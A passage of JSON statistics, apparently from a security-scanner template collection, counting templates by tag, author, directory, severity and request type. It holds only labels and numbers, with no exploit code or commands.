der-injection","count":2},{"name":"cve2005","count":2},{"name":"favicon","count":2},{"name":"igs","count":2},{"name":"nextcloud","count":2},{"name":"wuzhicms","count":2},{"name":"shellshock","count":2},{"name":"backdoor","count":2},{"name":"github","count":2},{"name":"sharepoint","count":2},{"name":"linux","count":2},{"name":"chamilo","count":2},{"name":"pega","count":2},{"name":"horde","count":2},{"name":"paloalto","count":2},{"name":"jsf","count":2},{"name":"mida","count":2},{"name":"showdoc","count":2},{"name":"dolibarr","count":2},{"name":"cve2007","count":2},{"name":"axis","count":2},{"name":"leak","count":2},{"name":"spark","count":2},{"name":"yii","count":2},{"name":"jeedom","count":2},{"name":"mcafee","count":2},{"name":"aruba","count":2},{"name":"nagios","count":2},{"name":"bruteforce","count":2},{"name":"axis2","count":2},{"name":"netis","count":2},{"name":"hjtcloud","count":2},{"name":"liferay","count":2},{"name":"jboss","count":2},{"name":"globalprotect","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"prestashop","count":2},{"name":"sitecore","count":2},{"name":"openfire","count":2},{"name":"xxljob","count":2},{"name":"azure","count":2},{"name":"totemomail","count":2},{"name":"guacamole","count":2},{"name":"oauth","count":2},{"name":"keycloak","count":2},{"name":"prtg","count":2},{"name":"kentico","count":2},{"name":"netgenie","count":1},{"name":"timeclock","count":1},{"name":"graphql","count":1},{"name":"mediumish","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"jmx","count":1},{"name":"phpfusion","count":1},{"name":"ecom","count":1},{"name":"pulsesecure","count":1},{"name":"spectracom","count":1},{"name":"hadoop","count":1},{"name":"pihole","count":1},{"name":"tjws","count":1},{"name":"dvwa","count":1},{"name":"mongo","count":1},{"name":"zarafa","count":1},{"name":"exposures","count":1},{"name":"heroku","count":1},{"name":"gespage","count":1},{"name":"webui","count":1},{"name":"st","count":1},{"name":"monitorr","count":1},{"name":"minimouse","count":1},{"name":"extractor","count":1},{"name":"zyxel","count":1},{"name":"plastic","count":1},{"name":"ns","count":1},{"name":"luftguitar","count":1},{"name":"tenda","count":1},{"name":"lanproxy","count":1},{"name":"dompdf","count":1},{"name":"cofax","count":1},{"name":"owa","count":1},{"name":"exacqvision","count":1},{"name":"tensorboard","count":1},{"name":"fortigate","count":1},{"name":"pyramid","count":1},{"name":"cerebro","count":1},{"name":"lighttpd","count":1},{"name":"mobileiron","count":1},{"name":"gitlist","count":1},{"name":"tongda","count":1},{"name":"jquery","count":1},{"name":"gstorage","count":1},{"name":"diris","count":1},{"name":"shoretel","count":1},{"name":"graphite","count":1},{"name":"aspnuke","count":1},{"name":"wamp","count":1},{"name":"email","count":1},{"name":"shopizer","count":1},{"name":"tcexam","count":1},{"name":"zms","count":1},{"name":"rabbitmq","count":1},{"name":"apos","count":1},{"name":"swagger","count":1},{"name":"postmessage","count":1},{"name":"h3c-imc","count":1},{"name":"gunicorn","count":1},{"name":"tamronos","count":1},{"name":"rubedo","count":1},{"name":"triconsole","count":1},{"name":"qsan","count":1},{"name":"mysql","count":1},{"name":"oneblog","count":1},{"name":"avtech","count":1},{"name":"smartblog","count":1},{"name":"sangfor","count":1},{"name":"parentlink","count":1},{"name":"influxdb","count":1},{"name":"argussurveillance","count":1},{"name":"fortiweb","count":1},{"name":"chyrp","count":1},{"name":"wmt","count":1},{"name":"pcoip","count":1},{"name":"auth","count":1},{"name":"node-red-dashboard","count":1},{"name":"etouch","count":1},{"name":"dom","count":1},{"name":"elasticsearch","count":1},{"name":"tika","count":1},{"name":"xampp","count":1},{"name":"actuator","count":1},{"name":"solman","count":1},{"name":"traefik","count":1},{"name":"sqlite","count":1},{"name":"wiki","count":1},{"name":"asus","count":1},{"name":"tectuus","count":1},{"name":"springframework","count":1},{"name":"panabit","count":1},{"name":"javascript","count":1},{"name":"eg","count":1},{"name":"csod","count":1},{"name":"ntopng","count":1},{"name":"websphere","count":1},{"name":"simplecrm","count":1},{"name":"shoppable","count":1},{"name":"zend","count":1},{"name":"upnp","count":1},{"name":"memcached","count":1},{"name":"camunda","count":1},{"name":"tapestry","count":1},{"name":"mantis","count":1},{"name":"achecker","count":1},{"name":"sprintful","count":1},{"name":"tor","count":1},{"name":"wildfly","count":1},{"name":"cse","count":1},{"name":"ruckus","count":1},{"name":"ognl","count":1},{"name":"haproxy","count":1},{"name":"majordomo2","count":1},{"name":"dnssec","count":1},{"name":"spring","count":1},{"name":"addpac","count":1},{"name":"geutebruck","count":1},{"name":"landray","count":1},{"name":"interlib","count":1},{"name":"ecoa","count":1},{"name":"turbocrm","count":1},{"name":"jeewms","count":1},{"name":"eyelock","count":1},{"name":"rfi","count":1},{"name":"nimble","count":1},{"name":"bash","count":1},{"name":"xiuno","count":1},{"name":"vnc","count":1},{"name":"pippoint","count":1},{"name":"pmb","count":1},{"name":"ganglia","count":1},{"name":"fastcgi","count":1},{"name":"zenario","count":1},{"name":"omi","count":1},{"name":"sentry","count":1},{"name":"yachtcontrol","count":1},{"name":"woocomernce","count":1},{"name":"mpsec","count":1},{"name":"hiawatha","count":1},{"name":"phpinfo","count":1},{"name":"oscommerce","count":1},{"name":"biometrics","count":1},{"name":"qvisdvr","count":1},{"name":"mautic","count":1},{"name":"kerbynet","count":1},{"name":"bolt","count":1},{"name":"ruby","count":1},{"name":"spf","count":1},{"name":"labtech","count":1},{"name":"dotclear","count":1},{"name":"sarg","count":1},{"name":"discord","count":1},{"name":"clickhouse","count":1},{"name":"upload","count":1},{"name":"sceditor","count":1},{"name":"lotuscms","count":1},{"name":"thinkadmin","count":1},{"name":"tileserver","count":1},{"name":"klog","count":1},{"name":"mrtg","count":1},{"name":"cscart","count":1},{"name":"zeroshell","count":1},{"name":"csrf","count":1},{"name":"octobercms","count":1},{"name":"shopware","count":1},{"name":"cockpit","count":1},{"name":"ssltls","count":1},{"name":"stem","count":1},{"name":"netrc","count":1},{"name":"cherokee","count":1},{"name":"esmtp","count":1},{"name":"wooyun","count":1},{"name":"panos","count":1},{"name":"wifisky","count":1},{"name":"myvuehelp","count":1},{"name":"pacsone","count":1},{"name":"phpunit","count":1},{"name":"ricoh","count":1},{"name":"iceflow","count":1},{"name":"k8s","count":1},{"name":"commscope","count":1},{"name":"nweb2fax","count":1},{"name":"centos","count":1},{"name":"fastapi","count":1},{"name":"shiro","count":1},{"name":"opensns","count":1},{"name":"metinfo","count":1},{"name":"seacms","count":1},{"name":"elfinder","count":1},{"name":"resourcespace","count":1},{"name":"monitorix","count":1},{"name":"plone","count":1},{"name":"scs","count":1},{"name":"postgres","count":1},{"name":"opentsdb","count":1},{"name":"xml","count":1},{"name":"timesheet","count":1},{"name":"domxss","count":1},{"name":"floc","count":1},{"name":"linkedin","count":1},{"name":"javafaces","count":1},{"name":"emc","count":1},{"name":"glances","count":1},{"name":"miscrsoft","count":1},{"name":"artica","count":1},{"name":"dotnetnuke","count":1},{"name":"nomad","count":1},{"name":"rmc","count":1},{"name":"fiori","count":1},{"name":"jitsi","count":1},{"name":"totaljs","count":1},{"name":"mongoshake","count":1},{"name":"gitea","count":1},{"name":"saltapi","count":1},{"name":"wing-ftp","count":1},{"name":"redhat","count":1},{"name":"setup","count":1},{"name":"sco","count":1},{"name":"servicedesk","count":1},{"name":"glowroot","count":1},{"name":"expn","count":1},{"name":"visualtools","count":1},{"name":"jenzabar","count":1},{"name":"checkpoint","count":1},{"name":"fuelcms","count":1},{"name":"sidekiq","count":1},{"name":"wavemaker","count":1},{"name":"gridx","count":1},{"name":"pgadmin","count":1},{"name":"emby","count":1},{"name":"adb","count":1},{"name":"fortigates","count":1},{"name":"solarlog","count":1},{"name":"empirecms","count":1},{"name":"listserv","count":1},{"name":"zmanda","count":1},{"name":"iptime","count":1},{"name":"gogs","count":1},{"name":"zzzcms","count":1},{"name":"pagespeed","count":1},{"name":"kindeditor","count":1},{"name":"ilo4","count":1},{"name":"mirai","count":1},{"name":"kubeflow","count":1},{"name":"nuxeo","count":1},{"name":"clockwork","count":1},{"name":"grails","count":1},{"name":"crm","count":1},{"name":"octoprint","count":1},{"name":"clockwatch","count":1},{"name":"blind","count":1},{"name":"sureline","count":1},{"name":"opensmtpd","count":1},{"name":"discourse","count":1},{"name":"api-manager","count":1},{"name":"processmaker","count":1},{"name":"mdb","count":1},{"name":"svnserve","count":1},{"name":"spidercontrol","count":1},{"name":"panasonic","count":1},{"name":"krweb","count":1},{"name":"optiLink","count":1},{"name":"74cms","count":1},{"name":"fortinet","count":1},{"name":"oidc","count":1},{"name":"whm","count":1},{"name":"lancom","count":1},{"name":"jsp","count":1},{"name":"k8","count":1},{"name":"database","count":1},{"name":"concrete","count":1},{"name":"ems","count":1},{"name":"spip","count":1},{"name":"sophos","count":1},{"name":"accela","count":1},{"name":"realteo","count":1},{"name":"elascticsearch","count":1},{"name":"azkaban","count":1},{"name":"robomongo","count":1},{"name":"selea","count":1},{"name":"lg-nas","count":1},{"name":"cve2006","count":1},{"name":"codeigniter","count":1},{"name":"magicflow","count":1},{"name":"ewebs","count":1},{"name":"bullwark","count":1},{"name":"kyan","count":1},{"name":"tracer","count":1},{"name":"portainer","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"weiphp","count":1},{"name":"tensorflow","count":1},{"name":"s3","count":1},{"name":"mailchimp","count":1},{"name":"flink","count":1},{"name":"natemail","count":1},{"name":"cyberoam","count":1},{"name":"websvn","count":1},{"name":"ssl","count":1},{"name":"gloo","count":1},{"name":"alerta","count":1},{"name":"rocketchat","count":1},{"name":"varnish","count":1},{"name":"frontpage","count":1},{"name":"metabase","count":1},{"name":"arl","count":1},{"name":"bitly","count":1},{"name":"ioncube","count":1},{"name":"netmask","count":1},{"name":"scimono","count":1},{"name":"primetek","count":1},{"name":"rsyncd","count":1},{"name":"maccmsv10","count":1},{"name":"eprints","count":1},{"name":"opencast","count":1},{"name":"cobub","count":1},{"name":"razor","count":1},{"name":"vcenter","count":1},{"name":"htmli","count":1},{"name":"zte","count":1},{"name":"plugin","count":1},{"name":"couchbase","count":1},{"name":"synnefo","count":1},{"name":"viewpoint","count":1},{"name":"trane","count":1},{"name":"jenkin","count":1},{"name":"woocommerce","count":1},{"name":"eyou","count":1},{"name":"duomicms","count":1},{"name":"nsasg","count":1},{"name":"blackboard","count":1},{"name":"redmine","count":1},{"name":"apiman","count":1},{"name":"openvpn","count":1},{"name":"chevereto","count":1},{"name":"circontrorl","count":1},{"name":"shopxo","count":1},{"name":"sar2html","count":1},{"name":"tpshop","count":1},{"name":"proftpd","count":1},{"name":"beanshell","count":1},{"name":"chinaunicom","count":1},{"name":"plc","count":1},{"name":"alibaba","count":1},{"name":"cors","count":1},{"name":"kafdrop","count":1},{"name":"tidb","count":1},{"name":"dotnet","count":1},{"name":"jaspersoft","count":1},{"name":"gsoap","count":1},{"name":"hiboss","count":1},{"name":"calendarix","count":1},{"name":"webmin","count":1},{"name":"phpwiki","count":1},{"name":"zookeeper","count":1},{"name":"webftp","count":1},{"name":"finereport","count":1},{"name":"keenetic","count":1},{"name":"cgi","count":1},{"name":"qdpm","count":1},{"name":"viewlinc","count":1},{"name":"acexy","count":1},{"name":"acontent","count":1},{"name":"lotus","count":1},{"name":"clave","count":1},{"name":"mara","count":1},{"name":"socomec","count":1},{"name":"idemia","count":1},{"name":"perl","count":1},{"name":"centreon","count":1},{"name":"okta","count":1},{"name":"b2evolution","count":1},{"name":"xdcms","count":1},{"name":"wavlink","count":1},{"name":"expose","count":1},{"name":"skywalking","count":1},{"name":"openerp","count":1},{"name":"fedora","count":1},{"name":"drone","count":1},{"name":"sgp","count":1},{"name":"werkzeug","count":1},{"name":"xvr","count":1},{"name":"erp-nc","count":1},{"name":"twitter-server","count":1},{"name":"episerver","count":1},{"name":"zcms","count":1},{"name":"soar","count":1},{"name":"mantisbt","count":1},{"name":"owasp","count":1},{"name":"craftcms","count":1},{"name":"clusterengine","count":1},{"name":"cocoon","count":1},{"name":"ghost","count":1},{"name":"huijietong","count":1},{"name":"avalanche","count":1},{"name":"netdata","count":1},{"name":"salesforce","count":1},{"name":"webmodule-ee","count":1},{"name":"olivetti","count":1},{"name":"smi","count":1},{"name":"ueditor","count":1},{"name":"svn","count":1},{"name":"rujjie","count":1},{"name":"gilacms","count":1},{"name":"terraform","count":1},{"name":"landrayoa","count":1},{"name":"openemr","count":1},{"name":"dvr","count":1},{"name":"vsphere","count":1},{"name":"redwood","count":1},{"name":"nps","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"bedita","count":1},{"name":"nc2","count":1},{"name":"mariadb","count":1},{"name":"expressjs","count":1},{"name":"blue-ocean","count":1},{"name":"daybyday","count":1},{"name":"burp","count":1},{"name":"rhymix","count":1},{"name":"graylog","count":1},{"name":"froxlor","count":1},{"name":"powercreator","count":1},{"name":"dbeaver","count":1},{"name":"openrestry","count":1},{"name":"office365","count":1},{"name":"openstack","count":1},{"name":"sourcebans","count":1},{"name":"yealink","count":1},{"name":"nordex","count":1},{"name":"comodo","count":1},{"name":"szhe","count":1},{"name":"darkstat","count":1},{"name":"bazarr","count":1},{"name":"default","count":1},{"name":"openx","count":1},{"name":"appweb","count":1},{"name":"myucms","count":1},{"name":"doh","count":1},{"name":"moinmoin","count":1},{"name":"moin","count":1},{"name":"nexusdb","count":1},{"name":"announcekit","count":1},{"name":"vidyo","count":1},{"name":"exponentcms","count":1},{"name":"vsftpd","count":1},{"name":"beanstalk","count":1},{"name":"webadmin","count":1},{"name":"lansweeper","count":1},{"name":"zm","count":1},{"name":"redis","count":1},{"name":"phalcon","count":1},{"name":"cloudinary","count":1},{"name":"smartsense","count":1},{"name":"ambari","count":1},{"name":"commax","count":1},{"name":"trilithic","count":1},{"name":"fortilogger","count":1},{"name":"xunchi","count":1},{"name":"anchorcms","count":1},{"name":"wazuh","count":1},{"name":"gateone","count":1},{"name":"rockethchat","count":1},{"name":"bigbluebutton","count":1},{"name":"geddy","count":1},{"name":"lutron","count":1},{"name":"linksys","count":1},{"name":"codemeter","count":1},{"name":"servicenow","count":1},{"name":"payara","count":1},{"name":"faraday","count":1},{"name":"rmi","count":1},{"name":"rdp","count":1},{"name":"bookstack","count":1},{"name":"vscode","count":1},{"name":"nuuo","count":1},{"name":"gotmls","count":1},{"name":"nette","count":1},{"name":"ulterius","count":1},{"name":"jfrog","count":1},{"name":"opm","count":1},{"name":"clink-office","count":1},{"name":"xmlchart","count":1},{"name":"sage","count":1},{"name":" default-login","count":1},{"name":"wondercms","count":1},{"name":"nedi","count":1},{"name":"subrion","count":1},{"name":"embedthis","count":1},{"name":"goahead","count":1},{"name":"feifeicms","count":1},{"name":"alertmanager","count":1},{"name":"cloudflare","count":1},{"name":"aura","count":1},{"name":"sql","count":1},{"name":"maxsite","count":1},{"name":"tieline","count":1},{"name":"circontrol","count":1},{"name":"logontracer","count":1},{"name":"karel","count":1},{"name":"hortonworks","count":1},{"name":"javamelody","count":1},{"name":"nifi","count":1},{"name":"acme","count":1},{"name":"jnoj","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":258},{"name":"daffainfo","count":213},{"name":"pdteam","count":195},{"name":"geeknik","count":152},{"name":"dwisiswant0","count":131},{"name":"gy741","count":72},{"name":"pussycat0x","count":67},{"name":"madrobot","count":61},{"name":"princechaddha","count":61},{"name":"gaurang","count":42},{"name":"0x_akoko","count":39},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"thomas_from_offensity","count":3},{"name":"vsh00t","count":3},{"name":"idealphase","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"sushantkamble","count":3},{"name":"shifacyclewala","count":3},{"name":"shine","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"johnk3r","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"mohammedsaneem","count":2},{"name":"hetroublemakr","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"0xelkomy","count":2},{"name":"bsysop","count":2},{"name":"ree4pwn","count":2},{"name":"swissky","count":2},{"name":"0xsapra","count":2},{"name":"alifathi-h1","count":2},{"name":"huowuzhao","count":2},{"name":"afaq","count":2},{"name":"random-robbie","count":2},{"name":"parth","count":2},{"name":"gal nagli","count":2},{"name":"bernardofsr","count":2},{"name":"vavkamil","count":2},{"name":"0xcrypto","count":2},{"name":"0xprial","count":2},{"name":"convisoappsec","count":2},{"name":"johnjhacking","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"zomsop82","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"ehsahil","count":2},{"name":"g4l1t0","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"lotusdll","count":2},{"name":"amsda","count":2},{"name":"x1m_martijn","count":2},{"name":"pxmme1337","count":2},{"name":"foulenzer","count":2},{"name":"hahwul","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whoever","count":2},{"name":"manas_harsh","count":2},{"name":"fabaff","count":2},{"name":"nkxxkn","count":2},{"name":"randomrobbie","count":2},{"name":"moritz nentwig","count":2},{"name":"cocxanh","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"bp0lr","count":2},{"name":"joeldeleep","count":2},{"name":"0xsmiley","count":2},{"name":"koti2","count":2},{"name":"r3naissance","count":2},{"name":"_c0wb0y_","count":1},{"name":"d0rkerdevil","count":1},{"name":"izn0u","count":1},{"name":"0xrod","count":1},{"name":"jeya seelan","count":1},{"name":"fmunozs","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"yavolo","count":1},{"name":"mesaglio","count":1},{"name":"ahmed sherif","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"alph4byt3","count":1},{"name":"alex","count":1},{"name":"sy3omda","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"knassar702","count":1},{"name":"bolli95","count":1},{"name":"0ut0fb4nd","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"thevillagehacker","count":1},{"name":"iampritam","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"mah3sec_","count":1},{"name":"exploitation","count":1},{"name":"mass0ma","count":1},{"name":"elder tao","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0h1in9e","count":1},{"name":"@dwisiswant0","count":1},{"name":"toufik airane","count":1},{"name":"adrianmf","count":1},{"name":"kabirsuda","count":1},{"name":"affix","count":1},{"name":"andysvints","count":1},{"name":"ringo","count":1},{"name":"ajaysenr","count":1},{"name":"x6263","count":1},{"name":"sullo","count":1},{"name":"wabafet","count":1},{"name":"zandros0","count":1},{"name":"pdp","count":1},{"name":"ldionmarcil","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"b0rn2r00t","count":1},{"name":"sickwell","count":1},{"name":"aresx","count":1},{"name":"un-fmunozs","count":1},{"name":"flag007","count":1},{"name":"tim_koopmans","count":1},{"name":"mubassirpatel","count":1},{"name":"patralos","count":1},{"name":"divya_mudgal","count":1},{"name":"rodnt","count":1},{"name":"brabbit10","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"regala_","count":1},{"name":"notsoevilweasel","count":1},{"name":"0xteles","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"petruknisme","count":1},{"name":"nerrorsec","count":1},{"name":"luci","count":1},{"name":"pudsec","count":1},{"name":"_darrenmartyn","count":1},{"name":"alperenkesk","count":1},{"name":"bad5ect0r","count":1},{"name":"me9187","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"vzamanillo","count":1},{"name":"smaranchand","count":1},{"name":"s1r1u5_","count":1},{"name":"borna nematzadeh","count":1},{"name":"infosecsanyam","count":1},{"name":"philippdelteil","count":1},{"name":"ahmetpergamum","count":1},{"name":"undefl0w","count":1},{"name":"fopina","count":1},{"name":"omarkurt","count":1},{"name":"xstp","count":1},{"name":"52971","count":1},{"name":"willd96","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"taielab","count":1},{"name":"becivells","count":1},{"name":"hanlaomo","count":1},{"name":"bjhulst","count":1},{"name":"kareemse1im","count":1},{"name":"yashgoti","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"nytr0gen","count":1},{"name":"manuelbua","count":1},{"name":"defr0ggy","count":1},{"name":"whynotke","count":1},{"name":"shelld3v","count":1},{"name":"luskabol","count":1},{"name":"shreyapohekar","count":1},{"name":"cookiehanhoan","count":1},{"name":"thezakman","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"juicypotato1","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"naglinagli","count":1},{"name":"kurohost","count":1},{"name":"blckraven","count":1},{"name":"furkansenan","count":1},{"name":"apt-mirror","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"micha3lb3n","count":1},{"name":"0xtavian","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"b0yd","count":1},{"name":"zhenwarx","count":1},{"name":"push4d","count":1},{"name":"raesene","count":1},{"name":"schniggie","count":1},{"name":"andirrahmani1","count":1},{"name":"ipanda","count":1},{"name":"ilovebinbash","count":1},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"its0x08","count":1},{"name":"soyelmago","count":1},{"name":"sec_hawk","count":1},{"name":"hakluke","count":1},{"name":"intx0x80","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"streetofhackerr007","count":1},{"name":"chron0x","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"b4uh0lz","count":1},{"name":"sshell","count":1},{"name":"co0nan","count":1},{"name":"noamrathaus","count":1},{"name":"gboddin","count":1},{"name":"ooooooo_q","count":1},{"name":"dawid-czarnecki","count":1},{"name":"elmahdi","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"revblock","count":1},{"name":"shifacyclewla","count":1},{"name":"kre80r","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"evolutionsec","count":1},{"name":"daviey","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"makyotox","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1}],"directory":[{"name":"cves","count":725},{"name":"vulnerabilities","count":301},{"name":"exposed-panels","count":247},{"name":"technologies","count":191},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":643},{"name":"high","count":553},{"name":"medium","count":448},{"name":"critical","count":273},{"name":"low","count":152}],"types":[{"name":"http","count":1965},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":731},{"name":"lfi","count":265},{"name":"panel","count":252},{"name":"xss","count":246},{"name":"exposure","count":233},{"name":"wordpress","count":229},{"name":"rce","count":199},{"name":"tech","count":183},{"name":"cve2020","count":164},{"name":"wp-plugin","count":155},{"name":"cve2021","count":130},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"oob","count":55},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":42},{"name":"sqli","count":38},{"name":"ssrf","count":38},{"name":"","count":37},{"name":"cve2016","count":36},{"name":"oracle","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":24},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"auth-bypass","count":21},{"name":"generic","count":21},{"name":"aem","count":19},{"name":"cve2014","count":19},{"name":"router","count":19},{"name":"cisco","count":19},{"name":"debug","count":18},{"name":"misconfig","count":18},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"struts","count":14},{"name":"cve2011","count":14},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"cve2012","count":14},{"name":"login","count":14},{"name":"devops","count":13},{"name":"adobe","count":13},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"manageengine","count":12},{"name":"aws","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"intrusive","count":9},{"name":"gitlab","count":8},{"name":"vmware","count":8},{"name":"scada","count":8},{"name":"ruijie","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"nginx","count":8},{"name":"rails","count":8},{"name":"files","count":7},{"name":"google","count":7},{"name":"coldfusion","count":7},{"name":"microsoft","count":7},{"name":"cve2009","count":7},{"name":"confluence","count":7},{"name":"ibm","count":7},{"name":"netgear","count":7},{"name":"kubernetes","count":7},{"name":"backup","count":7},{"name":"cms","count":7},{"name":"cve2008","count":6},{"name":"citrix","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"solr","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"laravel","count":6},{"name":"drupal","count":5},{"name":"headless","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"tomcat","count":5},{"name":"windows","count":5},{"name":"circarlife","count":5},{"name":"nodejs","count":5},{"name":"fileupload","count":5},{"name":"jolokia","count":5},{"name":"printer","count":5},{"name":"deserialization","count":5},{"name":"hp","count":5},{"name":"dedecms","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"vpn","count":4},{"name":"exchange","count":4},{"name":"git","count":4},{"name":"magmi","count":4},{"name":"thinkphp","count":4},{"name":"samsung","count":4},{"name":"proxy","count":4},{"name":"zabbix","count":4},{"name":"firmware","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"symantec","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"moodle","count":4},{"name":"webserver","count":4},{"name":"glpi","count":4},{"name":"crlf","count":4},{"name":"grafana","count":4},{"name":"thinkcmf","count":4},{"name":"elastic","count":4},{"name":"strapi","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"buffalo","count":4},{"name":"resin","count":4},{"name":"wso2","count":4},{"name":"asp","count":4},{"name":"rfi","count":4},{"name":"kibana","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"ssh","count":3},{"name":"vbulletin","count":3},{"name":"httpd","count":3},{"name":"zhiyuan","count":3},{"name":"microstrategy","count":3},{"name":"nexus","count":3},{"name":"amazon","count":3},{"name":"slack","count":3},{"name":"mail","count":3},{"name":"jeesns","count":3},{"name":"oa","count":3},{"name":"caucho","count":3},{"name":"fanruan","count":3},{"name":"npm","count":3},{"name":"fpd","count":3},{"name":"backups","count":3},{"name":"jellyfin","count":3},{"name":"tikiwiki","count":3},{"name":"lfr","count":3},{"name":"hoteldruid","count":3},{"name":"druid","count":3},{"name":"springcloud","count":3},{"name":"opensis","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nacos","count":3},{"name":"itop","count":3},{"name":"r-seenet","count":3},{"name":"targa","count":3},{"name":"ofbiz","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"ebs","count":3},{"name":"telerik","count":3},{"name":"bigip","count":3},{"name":"cacti","count":3},{"name":"firebase","count":3},{"name":"linkerd","count":3},{"name":"injection","count":3},{"name":"openam","count":3},{"name":"bitrix","count":3},{"name":"prometheus","count":3